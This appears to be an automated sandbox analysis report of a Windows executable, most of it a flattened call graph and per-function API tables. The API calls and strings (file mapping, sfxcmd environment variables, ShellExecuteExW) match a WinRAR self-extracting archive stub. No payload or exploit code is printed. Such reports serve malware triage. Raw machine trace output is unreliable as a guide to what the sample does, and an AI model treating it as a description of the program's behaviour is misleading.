5898c5 GetFileType 24616->24618 24617->24364 24619 582021 74 API calls 24617->24619 24618->24617 24619->24362 24620->24364 24621->24365 24622->24390 24623->24390 24624->24390 24625->24390 24626->24390 24627->24393 24628->24402 24629->24344 24636 585b48 24630->24636 24632 585c6c 24632->24587 24634 585b48 2 API calls 24634->24632 24635->24587 24638 585b52 24636->24638 24637 585c3a 24637->24632 24637->24634 24638->24637 24640 58b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24638->24640 24640->24638 24641->24594 24642->24591 24643->24599 24644->24597 24646 58cef2 24645->24646 24651 58a99e 86 API calls 24646->24651 24648 58cf24 24652 58a99e 86 API calls 24648->24652 24650 58cf2f 24651->24648 24652->24650 24653->24410 24655 58a6a8 24654->24655 24656 58a6c1 FindFirstFileW 24655->24656 24657 58a727 FindNextFileW 24655->24657 24658 58a6d0 24656->24658 24664 58a709 24656->24664 24659 58a732 GetLastError 24657->24659 24657->24664 24660 58bb03 GetCurrentDirectoryW 24658->24660 24659->24664 24661 58a6e0 24660->24661 24662 58a6fe GetLastError 24661->24662 24663 58a6e4 FindFirstFileW 24661->24663 24662->24664 24663->24662 24663->24664 24664->24262 24674 59a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24665->24674 24667 59a5cd 24669 59a5d9 24667->24669 24675 59a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24667->24675 24669->24060 24669->24061 24670->24062 24671->24070 24672->24070 24673->24073 24674->24667 24675->24669 24676->24081 24678 589f42 78 API calls 24677->24678 24679 581fe8 24678->24679 24680 581a04 101 API calls 24679->24680 24683 582005 24679->24683 24681 581ff5 24680->24681 24681->24683 24684 58138b 74 API calls 24681->24684 24683->24089 24683->24090 24684->24683 24685 5813e1 84 API calls 2 library calls 25356 5994e0 GetClientRect 25386 5921e0 26 API calls std::bad_exception::bad_exception 25406 59f2e0 46 API calls __RTC_Initialize 25407 5abee0 GetCommandLineA GetCommandLineW 24687 59eae7 24688 59eaf1 24687->24688 24689 59e85d ___delayLoadHelper2@8 
14 API calls 24688->24689 24690 59eafe 24689->24690 25357 59f4e7 29 API calls _abort 25358 5ab49d 6 API calls _ValidateLocalCookies 25360 59c793 97 API calls 4 library calls 25388 59b18d 78 API calls 25389 599580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25408 59c793 102 API calls 5 library calls 25428 591bbd GetCPInfo IsDBCSLeadByte 25390 59b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24837 59f3b2 24838 59f3be ___scrt_is_nonwritable_in_current_image 24837->24838 24869 59eed7 24838->24869 24840 59f3c5 24841 59f518 24840->24841 24844 59f3ef 24840->24844 24942 59f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24841->24942 24843 59f51f 24935 5a7f58 24843->24935 24855 59f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24844->24855 24880 5a8aed 24844->24880 24851 59f40e 24853 59f48f 24888 59f953 GetStartupInfoW _abort 24853->24888 24855->24853 24938 5a7af4 38 API calls 2 library calls 24855->24938 24856 59f495 24889 5a8a3e 51 API calls 24856->24889 24859 59f49d 24890 59df1e 24859->24890 24863 59f4b1 24863->24843 24864 59f4b5 24863->24864 24865 59f4be 24864->24865 24940 5a7efb 28 API calls _abort 24864->24940 24941 59f048 12 API calls ___scrt_uninitialize_crt 24865->24941 24868 59f4c6 24868->24851 24870 59eee0 24869->24870 24944 59f654 IsProcessorFeaturePresent 24870->24944 24872 59eeec 24945 5a2a5e 24872->24945 24874 59eef1 24875 59eef5 24874->24875 24953 5a8977 24874->24953 24875->24840 24878 59ef0c 24878->24840 24882 5a8b04 24880->24882 24881 59fbbc _ValidateLocalCookies 5 API calls 24883 59f408 24881->24883 24882->24881 24883->24851 24884 5a8a91 24883->24884 24887 5a8ac0 24884->24887 24885 59fbbc _ValidateLocalCookies 5 API calls 24886 5a8ae9 24885->24886 24886->24855 24887->24885 24888->24856 24889->24859 25046 590863 24890->25046 24894 59df3d 25095 59ac16 24894->25095 24896 59df46 _abort 24897 59df59 GetCommandLineW 24896->24897 24898 59df68 
24897->24898 24899 59dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24897->24899 25099 59c5c4 24898->25099 24900 584092 _swprintf 51 API calls 24899->24900 24902 59e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24900->24902 25110 59b6dd LoadBitmapW 24902->25110 24905 59dfe0 25104 59dbde 24905->25104 24906 59df76 OpenFileMappingW 24908 59df8f MapViewOfFile 24906->24908 24909 59dfd6 CloseHandle 24906->24909 24912 59dfcd UnmapViewOfFile 24908->24912 24913 59dfa0 __InternalCxxFrameHandler 24908->24913 24909->24899 24912->24909 24917 59dbde 2 API calls 24913->24917 24919 59dfbc 24917->24919 24918 5990b7 8 API calls 24920 59e0aa DialogBoxParamW 24918->24920 24919->24912 24921 59e0e4 24920->24921 24922 59e0fd 24921->24922 24923 59e0f6 Sleep 24921->24923 24926 59e10b 24922->24926 25140 59ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24922->25140 24923->24922 24925 59e12a DeleteObject 24927 59e13f DeleteObject 24925->24927 24928 59e146 24925->24928 24926->24925 24927->24928 24929 59e189 24928->24929 24930 59e177 24928->24930 25137 59ac7c 24929->25137 25141 59dc3b 6 API calls 24930->25141 24932 59e17d CloseHandle 24932->24929 24934 59e1c3 24939 59f993 GetModuleHandleW 24934->24939 25271 5a7cd5 24935->25271 24938->24853 24939->24863 24940->24865 24941->24868 24942->24843 24944->24872 24957 5a3b07 24945->24957 24949 5a2a7a 24949->24874 24950 5a2a6f 24950->24949 24971 5a3b43 DeleteCriticalSection 24950->24971 24952 5a2a67 24952->24874 25000 5ac05a 24953->25000 24956 5a2a7d 7 API calls 2 library calls 24956->24875 24960 5a3b10 24957->24960 24959 5a3b39 24977 5a3b43 DeleteCriticalSection 24959->24977 24960->24959 24962 5a2a63 24960->24962 24972 5a3d46 24960->24972 24962->24952 24963 5a2b8c 24962->24963 24993 5a3c57 24963->24993 24966 5a2ba1 24966->24950 24968 5a2baf 24969 5a2bbc 24968->24969 24999 5a2bbf 6 API calls ___vcrt_FlsFree 24968->24999 24969->24950 24971->24952 24978 5a3c0d 24972->24978 24975 5a3d7e InitializeCriticalSectionAndSpinCount 
24976 5a3d69 24975->24976 24976->24960 24977->24962 24979 5a3c26 24978->24979 24980 5a3c4f 24978->24980 24979->24980 24985 5a3b72 24979->24985 24980->24975 24980->24976 24983 5a3c3b GetProcAddress 24983->24980 24984 5a3c49 24983->24984 24984->24980 24991 5a3b7e ___vcrt_FlsSetValue 24985->24991 24986 5a3bf3 24986->24980 24986->24983 24987 5a3b95 LoadLibraryExW 24988 5a3bfa 24987->24988 24989 5a3bb3 GetLastError 24987->24989 24988->24986 24990 5a3c02 FreeLibrary 24988->24990 24989->24991 24990->24986 24991->24986 24991->24987 24992 5a3bd5 LoadLibraryExW 24991->24992 24992->24988 24992->24991 24994 5a3c0d ___vcrt_FlsSetValue 5 API calls 24993->24994 24995 5a3c71 24994->24995 24996 5a3c8a TlsAlloc 24995->24996 24997 5a2b96 24995->24997 24997->24966 24998 5a3d08 6 API calls ___vcrt_FlsSetValue 24997->24998 24998->24968 24999->24966 25003 5ac077 25000->25003 25004 5ac073 25000->25004 25001 59fbbc _ValidateLocalCookies 5 API calls 25002 59eefe 25001->25002 25002->24878 25002->24956 25003->25004 25006 5aa6a0 25003->25006 25004->25001 25007 5aa6ac ___scrt_is_nonwritable_in_current_image 25006->25007 25018 5aac31 EnterCriticalSection 25007->25018 25009 5aa6b3 25019 5ac528 25009->25019 25011 5aa6c2 25012 5aa6d1 25011->25012 25032 5aa529 29 API calls 25011->25032 25034 5aa6ed LeaveCriticalSection _abort 25012->25034 25015 5aa6cc 25033 5aa5df GetStdHandle GetFileType 25015->25033 25016 5aa6e2 _abort 25016->25003 25018->25009 25020 5ac534 ___scrt_is_nonwritable_in_current_image 25019->25020 25021 5ac558 25020->25021 25022 5ac541 25020->25022 25035 5aac31 EnterCriticalSection 25021->25035 25043 5a91a8 20 API calls __dosmaperr 25022->25043 25025 5ac546 25044 5a9087 26 API calls ___std_exception_copy 25025->25044 25027 5ac550 _abort 25027->25011 25028 5ac590 25045 5ac5b7 LeaveCriticalSection _abort 25028->25045 25030 5ac564 25030->25028 25036 5ac479 25030->25036 25032->25015 25033->25012 25034->25016 25035->25030 25037 5ab136 _unexpected 20 API calls 25036->25037 25038 5ac48b 
25037->25038 25040 5aaf0a 11 API calls 25038->25040 25042 5ac498 25038->25042 25039 5a8dcc _free 20 API calls 25041 5ac4ea 25039->25041 25040->25038 25041->25030 25042->25039 25043->25025 25044->25027 25045->25027 25047 59ec50 25046->25047 25048 59086d GetModuleHandleW 25047->25048 25049 590888 GetProcAddress 25048->25049 25050 5908e7 25048->25050 25052 5908b9 GetProcAddress 25049->25052 25053 5908a1 25049->25053 25051 590c14 GetModuleFileNameW 25050->25051 25151 5a75fb 42 API calls 2 library calls 25050->25151 25062 590c32 25051->25062 25054 5908cb 25052->25054 25053->25052 25054->25050 25056 590b54 25056->25051 25057 590b5f GetModuleFileNameW CreateFileW 25056->25057 25058 590c08 CloseHandle 25057->25058 25059 590b8f SetFilePointer 25057->25059 25058->25051 25059->25058 25060 590b9d ReadFile 25059->25060 25060->25058 25064 590bbb 25060->25064 25065 590c94 GetFileAttributesW 25062->25065 25067 590c5d CompareStringW 25062->25067 25068 590cac 25062->25068 25142 58b146 25062->25142 25145 59081b 25062->25145 25064->25058 25066 59081b 2 API calls 25064->25066 25065->25062 25065->25068 25066->25064 25067->25062 25069 590cb7 25068->25069 25071 590cec 25068->25071 25072 590cd0 GetFileAttributesW 25069->25072 25074 590ce8 25069->25074 25070 590dfb 25094 59a64d GetCurrentDirectoryW 25070->25094 25071->25070 25073 58b146 GetVersionExW 25071->25073 25072->25069 25072->25074 25075 590d06 25073->25075 25074->25071 25076 590d0d 25075->25076 25077 590d73 25075->25077 25079 59081b 2 API calls 25076->25079 25078 584092 _swprintf 51 API calls 25077->25078 25080 590d9b AllocConsole 25078->25080 25081 590d17 25079->25081 25082 590da8 GetCurrentProcessId AttachConsole 25080->25082 25083 590df3 ExitProcess 25080->25083 25084 59081b 2 API calls 25081->25084 25152 5a3e13 25082->25152 25086 590d21 25084->25086 25088 58e617 53 API calls 25086->25088 25087 590dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25087->25083 25089 590d3c 25088->25089 25090 584092 _swprintf 51 API calls 
25089->25090 25091 590d4f 25090->25091 25092 58e617 53 API calls 25091->25092 25093 590d5e 25092->25093 25093->25083 25094->24894 25096 59081b 2 API calls 25095->25096 25097 59ac2a OleInitialize 25096->25097 25098 59ac4d GdiplusStartup SHGetMalloc 25097->25098 25098->24896 25102 59c5ce 25099->25102 25100 59c6e4 25100->24905 25100->24906 25101 591fac CharUpperW 25101->25102 25102->25100 25102->25101 25154 58f3fa 82 API calls 2 library calls 25102->25154 25105 59ec50 25104->25105 25106 59dbeb SetEnvironmentVariableW 25105->25106 25107 59dc0e 25106->25107 25108 59dc36 25107->25108 25109 59dc2a SetEnvironmentVariableW 25107->25109 25108->24899 25109->25108 25111 59b70b GetObjectW 25110->25111 25112 59b6fe 25110->25112 25114 59b71a 25111->25114 25155 59a6c2 FindResourceW 25112->25155 25116 59a5c6 4 API calls 25114->25116 25117 59b72d 25116->25117 25118 59b770 25117->25118 25119 59b74c 25117->25119 25120 59a6c2 12 API calls 25117->25120 25129 58da42 25118->25129 25169 59a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25119->25169 25122 59b73d 25120->25122 25122->25119 25124 59b743 DeleteObject 25122->25124 25123 59b754 25170 59a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25123->25170 25124->25119 25126 59b75d 25171 59a80c 8 API calls 25126->25171 25128 59b764 DeleteObject 25128->25118 25180 58da67 25129->25180 25134 5990b7 25135 59eb38 8 API calls 25134->25135 25136 5990d6 25135->25136 25136->24918 25138 59acab GdiplusShutdown CoUninitialize 25137->25138 25138->24934 25140->24926 25141->24932 25143 58b15a GetVersionExW 25142->25143 25144 58b196 25142->25144 25143->25144 25144->25062 25146 59ec50 25145->25146 25147 590828 GetSystemDirectoryW 25146->25147 25148 59085e 25147->25148 25149 590840 25147->25149 25148->25062 25150 590851 LoadLibraryW 25149->25150 25150->25148 25151->25056 25153 5a3e1b 25152->25153 25153->25087 25153->25153 25154->25102 25156 59a7d3 25155->25156 25157 59a6e5 SizeofResource 25155->25157 25156->25111 25156->25114 25157->25156 25158 59a6fc 
LoadResource 25157->25158 25158->25156 25159 59a711 LockResource 25158->25159 25159->25156 25160 59a722 GlobalAlloc 25159->25160 25160->25156 25161 59a73d GlobalLock 25160->25161 25162 59a7cc GlobalFree 25161->25162 25163 59a74c __InternalCxxFrameHandler 25161->25163 25162->25156 25164 59a7c5 GlobalUnlock 25163->25164 25172 59a626 GdipAlloc 25163->25172 25164->25162 25167 59a79a GdipCreateHBITMAPFromBitmap 25168 59a7b0 25167->25168 25168->25164 25169->25123 25170->25126 25171->25128 25173 59a638 25172->25173 25175 59a645 25172->25175 25176 59a3b9 25173->25176 25175->25164 25175->25167 25175->25168 25177 59a3da GdipCreateBitmapFromStreamICM 25176->25177 25178 59a3e1 GdipCreateBitmapFromStream 25176->25178 25179 59a3e6 25177->25179 25178->25179 25179->25175 25181 58da75 _wcschr __EH_prolog 25180->25181 25182 58daa4 GetModuleFileNameW 25181->25182 25183 58dad5 25181->25183 25184 58dabe 25182->25184 25226 5898e0 25183->25226 25184->25183 25186 58db31 25237 5a6310 25186->25237 25187 58959a 80 API calls 25189 58da4e 25187->25189 25188 58e261 78 API calls 25191 58db05 25188->25191 25224 58e29e GetModuleHandleW FindResourceW 25189->25224 25191->25186 25191->25188 25204 58dd4a 25191->25204 25192 58db44 25193 5a6310 26 API calls 25192->25193 25201 58db56 ___vcrt_FlsSetValue 25193->25201 25194 58dc85 25194->25204 25257 589d70 81 API calls 25194->25257 25196 589e80 79 API calls 25196->25201 25198 58dc9f ___std_exception_copy 25199 589bd0 82 API calls 25198->25199 25198->25204 25202 58dcc8 ___std_exception_copy 25199->25202 25201->25194 25201->25196 25201->25204 25251 589bd0 25201->25251 25256 589d70 81 API calls 25201->25256 25202->25204 25209 58dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25202->25209 25258 591b84 MultiByteToWideChar 25202->25258 25204->25187 25205 58e159 25217 58e1de 25205->25217 25264 5a8cce 26 API calls ___std_exception_copy 25205->25264 25207 58e16e 25265 5a7625 26 API calls ___std_exception_copy 25207->25265 25209->25204 25209->25205 25220 
591da7 WideCharToMultiByte 25209->25220 25259 58e5b1 50 API calls __vsnprintf 25209->25259 25260 5a6159 26 API calls 3 library calls 25209->25260 25261 5a8cce 26 API calls ___std_exception_copy 25209->25261 25262 5a7625 26 API calls ___std_exception_copy 25209->25262 25263 58e27c 78 API calls 25209->25263 25211 58e1c6 25266 58e27c 78 API calls 25211->25266 25212 58e214 25215 5a6310 26 API calls 25212->25215 25214 58e261 78 API calls 25214->25217 25216 58e22d 25215->25216 25218 5a6310 26 API calls 25216->25218 25217->25212 25217->25214 25218->25204 25220->25209 25225 58da55 25224->25225 25225->25134 25227 5898ea 25226->25227 25228 58994b CreateFileW 25227->25228 25229 58996c GetLastError 25228->25229 25232 5899bb 25228->25232 25230 58bb03 GetCurrentDirectoryW 25229->25230 25231 58998c 25230->25231 25231->25232 25233 589990 CreateFileW GetLastError 25231->25233 25234 5899ff 25232->25234 25236 5899e5 SetFileTime 25232->25236 25233->25232 25235 5899b5 25233->25235 25234->25191 25235->25232 25236->25234 25238 5a6349 25237->25238 25239 5a634d 25238->25239 25250 5a6375 25238->25250 25267 5a91a8 20 API calls __dosmaperr 25239->25267 25241 5a6699 25244 59fbbc _ValidateLocalCookies 5 API calls 25241->25244 25242 5a6352 25268 5a9087 26 API calls ___std_exception_copy 25242->25268 25246 5a66a6 25244->25246 25245 5a635d 25247 59fbbc _ValidateLocalCookies 5 API calls 25245->25247 25246->25192 25248 5a6369 25247->25248 25248->25192 25250->25241 25269 5a6230 5 API calls _ValidateLocalCookies 25250->25269 25252 589bdc 25251->25252 25253 589be3 25251->25253 25252->25201 25253->25252 25255 589785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25253->25255 25270 586d1a 77 API calls 25253->25270 25255->25253 25256->25201 25257->25198 25258->25209 25259->25209 25260->25209 25261->25209 25262->25209 25263->25209 25264->25207 25265->25211 25266->25217 25267->25242 25268->25245 25269->25250 25270->25253 25272 5a7ce1 _unexpected 25271->25272 25273 5a7cfa 25272->25273 25274 
5a7ce8 25272->25274 25295 5aac31 EnterCriticalSection 25273->25295 25307 5a7e2f GetModuleHandleW 25274->25307 25277 5a7ced 25277->25273 25308 5a7e73 GetModuleHandleExW 25277->25308 25281 5a7d76 25290 5a8a91 _abort 5 API calls 25281->25290 25292 5a7d8e 25281->25292 25283 5a7d01 25283->25281 25293 5a7d9f 25283->25293 25316 5a87e0 20 API calls _abort 25283->25316 25284 5a7de8 25317 5b2390 5 API calls _ValidateLocalCookies 25284->25317 25285 5a7dbc 25299 5a7dee 25285->25299 25286 5a8a91 _abort 5 API calls 25286->25293 25290->25292 25292->25286 25296 5a7ddf 25293->25296 25295->25283 25318 5aac81 LeaveCriticalSection 25296->25318 25298 5a7db8 25298->25284 25298->25285 25319 5ab076 25299->25319 25302 5a7e1c 25304 5a7e73 _abort 8 API calls 25302->25304 25303 5a7dfc GetPEB 25303->25302 25305 5a7e0c GetCurrentProcess TerminateProcess 25303->25305 25306 5a7e24 ExitProcess 25304->25306 25305->25302 25307->25277 25309 5a7e9d GetProcAddress 25308->25309 25310 5a7ec0 25308->25310 25314 5a7eb2 25309->25314 25311 5a7ecf 25310->25311 25312 5a7ec6 FreeLibrary 25310->25312 25313 59fbbc _ValidateLocalCookies 5 API calls 25311->25313 25312->25311 25315 5a7cf9 25313->25315 25314->25310 25315->25273 25316->25281 25318->25298 25320 5ab09b 25319->25320 25324 5ab091 25319->25324 25321 5aac98 _unexpected 5 API calls 25320->25321 25321->25324 25322 59fbbc _ValidateLocalCookies 5 API calls 25323 5a7df8 25322->25323 25323->25302 25323->25303 25324->25322 25430 586faa 111 API calls 3 library calls 25363 59dca1 DialogBoxParamW 25431 59f3a0 27 API calls 25366 5aa4a0 71 API calls _free 25367 5b08a0 IsProcessorFeaturePresent 25393 59eda7 48 API calls _unexpected

Control-flow Graph

APIs
  • Part of subcall function 00590863: GetModuleHandleW.KERNEL32(kernel32), ref: 0059087C
  • Part of subcall function 00590863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0059088E
  • Part of subcall function 00590863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005908BF
  • Part of subcall function 0059A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0059A655
  • Part of subcall function 0059AC16: OleInitialize.OLE32(00000000), ref: 0059AC2F
  • Part of subcall function 0059AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0059AC66
  • Part of subcall function 0059AC16: SHGetMalloc.SHELL32(005C8438), ref: 0059AC70
• GetCommandLineW.KERNEL32 ref: 0059DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0059DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0059DF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 0059DFCE
  • Part of subcall function 0059DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0059DBF4
  • Part of subcall function 0059DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0059DC30
• CloseHandle.KERNEL32(00000000), ref: 0059DFD7
• GetModuleFileNameW.KERNEL32(00000000,005DEC90,00000800), ref: 0059DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,005DEC90), ref: 0059DFFE
• GetLocalTime.KERNEL32(?), ref: 0059E009
• _swprintf.LIBCMT ref: 0059E048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0059E05A
• GetModuleHandleW.KERNEL32(00000000), ref: 0059E061
• LoadIconW.USER32(00000000,00000064), ref: 0059E078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0059E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 0059E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 0059E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 0059E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 0059E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz]
                                                                                                                    • API String ID: 3049964643-1100332339

                                                                                                                    Control-flow Graph
                                                                                                                    • [Graph image not preserved: control flow of the function starting at 0059A6C2, basic blocks marked Executed or Not Executed]
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0059B73D,00000066), ref: 0059A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0059B73D,00000066), ref: 0059A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0059A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0059A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0059A7C6
                                                                                                                      • Part of subcall function 0059A626: GdipAlloc.GDIPLUS(00000010), ref: 0059A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0059A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0059A7CD
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: FjunY$PNG
                                                                                                                    • API String ID: 211097158-2413478085

                                                                                                                    Control-flow Graph
                                                                                                                    • [Graph image not preserved: control flow of the function starting at 0058A69B, basic blocks marked Executed or Not Executed]
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6C4
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0058A592,000000FF,?,?), ref: 0058A734
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002,00000000), ref: 005A7E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002,00000000), ref: 005A7E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 005A7E28
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059B7E5
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0059B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0059B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0059B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0059B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059B9B1
                                                                                                                      • Part of subcall function 0059D453: _wcschr.LIBVCRUNTIME ref: 0059D45C
                                                                                                                      • Part of subcall function 0059D453: _wcslen.LIBCMT ref: 0059D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 0059B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 0059BA24
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 0059D4D4: GetDlgItem.USER32(00000068,005DFCB8), ref: 0059D4E8
                                                                                                                      • Part of subcall function 0059D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0059AF07,00000001,?,?,0059B7B9,005B506C,005DFCB8,005DFCB8,00001000,00000000,00000000), ref: 0059D510
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059D51B
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059D529
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D53F
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0059D559
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D59D
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0059D5AB
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D5BA
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D5E1
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005B43F4), ref: 0059D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0059BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0059BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 0059BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 0059BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0059BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0059BB43
                                                                                                                    • _swprintf.LIBCMT ref: 0059BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0059BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0059BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0059BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0059BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0059BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0059BCE2
